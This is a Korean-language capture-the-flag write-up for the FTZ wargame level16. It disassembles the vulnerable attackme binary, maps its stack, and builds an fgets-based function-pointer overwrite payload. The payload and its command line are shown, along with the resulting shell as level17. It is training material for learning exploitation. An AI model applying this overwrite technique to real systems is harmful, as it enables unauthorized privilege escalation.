[level16@ftz level16]$ cp attackme tmp
[level16@ftz level16]$ cd tmp
[level16@ftz tmp]$ gdb -q attackme

(gdb) disas main

   0x08048518 <+0>:     push   %ebp
   0x08048519 <+1>:     mov    %esp,%ebp
   - 함수 프롤로그

   0x0804851b <+3>:     sub    $0x38,%esp
   - 스택(esp)에 56byte 만큼 공간 확보

   0x0804851e <+6>:     movl   $0x8048500,-0x10(%ebp)
   - 0x8048500 <printit> ,  [ebp-0x10] 에 대입
   - '0x8048500'값을 ebp-0x10에 대입
   - '0x8048500'주소는 printit

   0x08048525 <+13>:    sub    $0x4,%esp
   - 스택에 4byte 만큼 공간 확보

   0x08048528 <+16>:    pushl  0x80496e8
   - 0x80496e8 <stdin@@GLIBC_2.0>:    ""  을 push

   0x0804852e <+22>:    push   $0x30
   - 0x30(48)을 스택에 push

   0x08048530 <+24>:    lea    -0x38(%ebp),%eax
   - [ebp-0x38] 주소 값을 eax에 대입한다.
   - [ebp-0x38]는 buf의 시작 주소이다.

   0x08048533 <+27>:    push   %eax
   - eax 스택에 push

   0x08048534 <+28>:    call   0x8048384 <fgets@plt>
   - 0x8048384 <fgets@plt> 호출

   0x08048539 <+33>:    add    $0x10,%esp
   - esp에서 16byte 만큼 공간 제거

   0x0804853c <+36>:    mov    -0x10(%ebp),%eax
   [ebp-0x10] 값을 eax에 대입

   0x0804853f <+39>:    call   *%eax
   - eax(ebp-0x10)에 잇는 함수 포인터 call 함수를 이용하여 printit 함수 호출

   0x08048541 <+41>:    leave
   0x08048542 <+42>:    ret
   - 함수 에필로그


   gdb 분석하고 스택 구조 그림
 [낮은 주소]
         buf   20      <- ebp -56 위치
         dummy 20byte
                       <- ebp -16 위치
         *call  4byte  <- 'shell 함수 주소 삽입'
         crap  4byte
         dummy 8byte
         sfp   4byte
         ret   4byte


 [높은 주소]


 0x4203f2c0 <system>

 [낮은 주소]
 		buf	  20byte	a*20개
 		dummy	20byte	a*20개
 		*call	4byte	0x080484d0(shell 함수 주소)
 		crap	4byte
 		dummy	8byte (확실한 dummy 위치는 아님)
 		sfp	  4byte
 		ret	  4byte
 [높은 주소]


  2) '0x080484d0' -> 리틀 엔디안 방식으로 변경

 0x080484d0	\xd0\x84\x04\x08


  3) 페이로드 제작

 "a"*40 + "\xd0\x84\x04\x08"

 [level16@ftz tmp]$ cd
 [level16@ftz level16]$ (python -c 'print("a"*40 + "\xd0\x84\x04\x08")';cat) | ./attackme

 [level16@ftz level16]$ (python -c 'print("a"*40 + "\xd0\x84\x04\x08")';cat) | ./attackme
 id
 uid=3097(level17) gid=3096(level16) groups=3096(level16)
 my-pass
